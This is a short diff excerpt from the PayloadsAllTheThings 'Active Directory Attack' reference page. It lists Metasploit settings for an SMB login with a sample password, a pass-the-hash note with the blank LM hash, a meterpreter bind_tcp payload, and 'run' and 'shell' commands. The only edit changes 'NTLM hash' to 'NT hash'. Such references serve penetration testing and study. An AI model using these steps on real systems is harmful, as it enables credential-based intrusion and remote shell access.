swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

   set SMBUser jarrieta
   set SMBPass nastyCutt3r
   # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
-  # NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
+  # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
   set PAYLOAD windows/meterpreter/bind_tcp
   run
   shell